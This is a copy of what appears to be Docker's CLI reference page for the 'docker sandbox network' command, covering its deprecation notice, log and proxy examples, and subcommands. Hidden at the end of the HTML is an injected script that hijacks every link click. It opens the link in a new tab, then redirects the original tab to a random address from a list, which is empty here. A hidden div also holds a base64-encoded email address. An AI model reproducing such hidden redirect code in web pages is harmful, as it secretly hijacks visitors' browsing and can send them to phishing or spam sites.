<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p># docker sandbox network

**Description:** Manage sandbox networking

**Usage:** `docker sandbox network`










## Description

&gt; [!WARNING]
&gt; The Docker Desktop-integrated `docker sandbox` commands are deprecated and
&gt; replaced by the standalone [`sbx` CLI](/ai/sandboxes/).
&gt; This deprecation applies only to the Docker Desktop integration, not to Docker
&gt; Sandboxes.

Manage sandbox networking




## Examples

### View network logs

```console
$ docker sandbox network log
```

### Configure proxy for a sandbox

```console
$ docker sandbox network proxy my-sandbox --block-host example.com
```

See the subcommands for more details:
- [`docker sandbox network log`](/reference/cli/docker/sandbox/network/log/) - Show network logs
- [`docker sandbox network proxy`](/reference/cli/docker/sandbox/network/proxy/) - Manage proxy configuration


## Subcommands

| Command | Description |
|---------|-------------|
| [`docker sandbox network log`](https://docs.docker.com/reference/cli/docker/sandbox/network/log/) | Show network logs |
| [`docker sandbox network proxy`](https://docs.docker.com/reference/cli/docker/sandbox/network/proxy/) | Manage proxy configuration for a sandbox |


</p><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
